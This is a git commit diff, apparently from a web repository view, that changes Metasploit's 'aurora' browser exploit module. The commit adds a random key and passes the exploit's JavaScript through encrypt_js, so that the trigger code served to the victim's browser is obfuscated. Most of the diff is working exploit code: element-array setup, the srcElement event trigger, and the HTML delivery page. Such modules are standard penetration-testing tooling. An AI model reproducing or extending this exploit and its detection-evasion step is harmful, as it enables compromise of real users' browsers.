add encrypt_js call to aurora exploit
git-svn-id: file:///home/svn/framework3/trunk@9184 4d416f70-5f16-0410-b530-b9f4589650daunstable
Joshua Drake
parent
2e2142d345
commit
2662055be8
|
|
@ -74,6 +74,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
],
|
],
|
||||||
'DisclosureDate' => 'Jan 14 2009', # wepawet sample
|
'DisclosureDate' => 'Jan 14 2009', # wepawet sample
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0))
|
||||||
|
|
||||||
|
@javascript_encode_key = rand_text_alpha(rand(10) + 10)
|
||||||
end
|
end
|
||||||
|
|
||||||
def on_request_uri(cli, request)
|
def on_request_uri(cli, request)
|
||||||
|
|
@ -106,11 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
var_start = rand_text_alpha(rand(100) + 1)
|
var_start = rand_text_alpha(rand(100) + 1)
|
||||||
rand_html = rand_text_english(rand(400) + 500)
|
rand_html = rand_text_english(rand(400) + 500)
|
||||||
|
|
||||||
html = %Q|<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
|
js = %Q|var #{var_element} = "COMMENT";
|
||||||
<html>
|
|
||||||
<head>
|
|
||||||
<script>
|
|
||||||
var #{var_element} = "COMMENT";
|
|
||||||
var #{var_el_array} = new Array();
|
var #{var_el_array} = new Array();
|
||||||
for (i = 0; i < 1300; i++)
|
for (i = 0; i < 1300; i++)
|
||||||
{
|
{
|
||||||
|
|
@ -143,6 +141,14 @@ for (i = 0; i < #{var_el_array}.length; i++)
|
||||||
}
|
}
|
||||||
var t = #{var_event}.srcElement;
|
var t = #{var_event}.srcElement;
|
||||||
}
|
}
|
||||||
|
|
|
||||||
|
js_encoded = encrypt_js(js, @javascript_encode_key)
|
||||||
|
|
||||||
|
html = %Q|<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<script>
|
||||||
|
#{js_encoded}
|
||||||
</script>
|
</script>
|
||||||
</head>
|
</head>
|
||||||
<body>
|
<body>
|
||||||
|
|
@ -158,4 +164,3 @@ var t = #{var_event}.srcElement;
|
||||||
handler(cli)
|
handler(cli)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue